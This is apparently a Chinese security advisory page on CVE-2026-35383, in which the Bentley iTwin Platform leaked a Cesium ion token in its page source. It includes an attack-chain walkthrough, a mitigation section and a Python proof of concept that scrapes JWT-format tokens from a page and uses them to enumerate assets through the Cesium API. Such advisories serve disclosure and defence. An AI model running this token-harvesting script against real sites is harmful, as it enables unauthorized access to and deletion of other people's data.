IPBUF安全漏洞报告
English
CVE-2026-35383 CVSS 6.5 中危

CVE-2026-35383: Bentley iTwin平台令牌泄露漏洞

披露日期: 2026-04-02
来源: 9119a7d8-5eab-497f-8521-727c672e3725

漏洞信息

漏洞编号
CVE-2026-35383
漏洞类型
敏感信息泄露
CVSS评分
6.5 中危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
Bentley Systems iTwin Platform

相关标签

敏感信息泄露令牌泄露Bentley iTwinCesium ion硬编码凭证

漏洞概述

Bentley Systems iTwin Platform被发现在部分网页源代码中意外泄露了Cesium ion访问令牌。该漏洞允许未经身份验证的远程攻击者利用泄露的令牌,对平台关联的资产进行枚举查看或删除操作。由于涉及敏感数据的访问权限,此漏洞对数据的机密性和可用性构成威胁。目前厂商已确认该问题,并于2026年3月27日移除了相关网页中的令牌,修复了此安全风险。

技术细节

该漏洞的根本原因在于Bentley Systems iTwin Platform在前端渲染过程中,未对敏感的Cesium ion访问令牌进行有效的混淆或隔离,而是将其直接嵌入到了返回给客户端的HTML源代码中。这种行为属于典型的“硬编码凭证”或“敏感信息泄露”。攻击者无需任何特权账号(PR:N)且无需用户交互(UI:N),只需访问受影响的网页并检查源代码,即可通过正则匹配或手动搜索获取明文令牌。根据CVSS向量分析,该漏洞攻击复杂度低(AC:L),一旦获取令牌,攻击者可利用Cesium ion API接口执行未授权操作。具体而言,攻击者可以使用该令牌发送API请求列举资产列表(影响机密性C:L)或发送删除请求移除特定资产(影响可用性A:L),从而造成数据泄露或业务中断。

攻击链分析

STEP 1
1. 信息收集
攻击者访问Bentley Systems iTwin Platform暴露特定功能的网页。
STEP 2
2. 源码分析
攻击者使用浏览器开发者工具或查看网页源代码功能,搜索HTML内容中的敏感字符串。
STEP 3
3. 令牌提取
攻击者在源代码中识别并提取出明文的Cesium ion访问令牌(通常为JWT格式)。
STEP 4
4. 未授权访问
攻击者使用提取的令牌构造HTTP请求,直接向Cesium ion API发送指令。
STEP 5
5. 资产破坏
利用API权限枚举敏感资产信息或发送删除请求,导致数据泄露或丢失。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests import re def exploit_cve_2026_35383(target_url): """ PoC for CVE-2026-35383: Cesium ion Token Leak This script attempts to find leaked tokens in the page source. """ try: # Step 1: Fetch the target webpage response = requests.get(target_url) if response.status_code != 200: print(f"[-] Failed to retrieve page. Status code: {response.status_code}") return page_source = response.text print("[+] Page source fetched successfully.") # Step 2: Search for Cesium ion access tokens (JWT format) # Cesium tokens typically start with 'eyJ' and contain two dots token_pattern = r'(eyJ[a-zA-Z0-9_-]+\.[a-zA-Z0-9_-]+\.[a-zA-Z0-9_-]+)' tokens = re.findall(token_pattern, page_source) if tokens: print(f"[+] Found {len(tokens)} potential token(s): {tokens[0]}") # Step 3: Verify token validity by attempting to access Cesium API api_endpoint = "https://api.cesium.com/v1/assets" headers = {"Authorization": f"Bearer {tokens[0]}"} api_resp = requests.get(api_endpoint, headers=headers) if api_resp.status_code == 200: print("[+] Token is valid! Successfully enumerated assets.") print(f"[+] Asset Data: {api_resp.json()}") else: print("[-] Token found but could not authenticate with API.") else: print("[-] No Cesium ion tokens found in page source.") except Exception as e: print(f"[-] An error occurred: {str(e)}") if __name__ == "__main__": # Replace with actual target URL target = "https://itwin-platform.example.com/vulnerable-page" exploit_cve_2026_35383(target)

影响范围

Bentley Systems iTwin Platform (2026-03-27之前)

防御指南

临时缓解措施
建议管理员立即检查Bentley Systems iTwin Platform的网页源代码,确认是否存在Cesium ion令牌泄露。如果无法立即升级,应立即在Cesium ion控制台中禁用或轮换可能已泄露的访问令牌,以阻断攻击者的未授权访问路径。同时,可通过网络访问控制列表限制对Cesium API的调用来源,作为临时的访问限制措施。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表